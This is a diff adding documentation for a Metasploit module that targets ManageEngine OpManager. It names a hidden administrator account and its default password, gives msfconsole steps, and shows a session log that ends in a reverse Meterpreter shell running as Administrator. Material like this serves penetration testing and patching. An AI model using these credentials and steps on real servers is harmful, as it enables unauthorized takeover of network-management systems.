|
| 1 | +## Description |
| 2 | + |
| 3 | +This module exploits a default credential vulnerability in ManageEngine OpManager, where a |
| 4 | +default hidden account "IntegrationUser" with administrator privileges exists. The account |
| 5 | +has a default password of "plugin" which can not be reset through the user interface. By |
| 6 | +log-in and abusing the default administrator's SQL query functionality, it's possible to |
| 7 | +write a WAR payload to disk and trigger an automatic deployment of this payload. |
| 8 | + |
| 9 | +## Vulnerable Application |
| 10 | + |
| 11 | +[OpManager](https://www.manageengine.com/network-monitoring/) is an application designed |
| 12 | +around "integrated network management". |
| 13 | + |
| 14 | +This module has been verified against the following OpManager versions: |
| 15 | + |
| 16 | +* v11.0 |
| 17 | +* v11.4 |
| 18 | +* v11.5 |
| 19 | +* v11.6 |
| 20 | + |
| 21 | +Installers: |
| 22 | + |
| 23 | +* [OpManager Installers](http://archives.manageengine.com/opmanager/) |
| 24 | + |
| 25 | +## Verification Steps |
| 26 | + |
| 27 | +1. Start msfconsole |
| 28 | +1. `use exploit/windows/http/manage_engine_opmanager_rce` |
| 29 | +1. `set RHOST <IP addr of target system running OpManager>` |
| 30 | +1. `exploit` |
| 31 | +1. You should get a working Meterpreter session |
| 32 | + |
| 33 | +## Scenarios |
| 34 | + |
| 35 | +### Targeting Windows Server 2012 running OpManager v11.5 |
| 36 | + |
| 37 | +``` |
| 38 | +msf > use exploit/windows/http/manage_engine_opmanager_rce |
| 39 | +msf exploit(manage_engine_opmanager_rce) > set RHOST 10.0.2.12 |
| 40 | +RHOST => 10.0.2.12 |
| 41 | +msf exploit(manage_engine_opmanager_rce) > exploit |
| 42 | +
|
| 43 | +[*] Started reverse TCP handler on 10.0.2.4:4444 |
| 44 | +[*] Access login page |
| 45 | +[*] Location is [ http://10.0.2.12/apiclient/ember/index.jsp;jsessionid=B5903DA9A1DBA5592690EC69AF7FA27D ] |
| 46 | +[*] Following redirection |
| 47 | +[*] Retrieved API key [ 2eb58a9f104f29c8520d23243502cf5b ] |
| 48 | +[*] Executing SQL queries |
| 49 | +[*] Attempting to launch payload in deployed WAR... |
| 50 | +[*] Attempting to launch payload in deployed WAR... |
| 51 | +[*] Attempting to launch payload in deployed WAR... |
| 52 | +[*] Sending stage (49667 bytes) to 10.0.2.12 |
| 53 | +[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.12:49496) at 2017-06-20 15:13:50 -0500 |
| 54 | +[+] Deleted tomcat//webapps//r63xuE3q1gOAZsCQuJ.war |
| 55 | +[!] This exploit may require manual cleanup of 'tomcat//webapps//r63xuE3q1gOAZsCQuJ' on the target |
| 56 | +
|
| 57 | +meterpreter > getuid |
| 58 | +Server username: Administrator |
| 59 | +meterpreter > sysinfo |
| 60 | +Computer : WIN-SI597APFOFH |
| 61 | +OS : Windows Server 2008 6.2 (amd64) |
| 62 | +Meterpreter : java/windows |
| 63 | +``` |
0 commit comments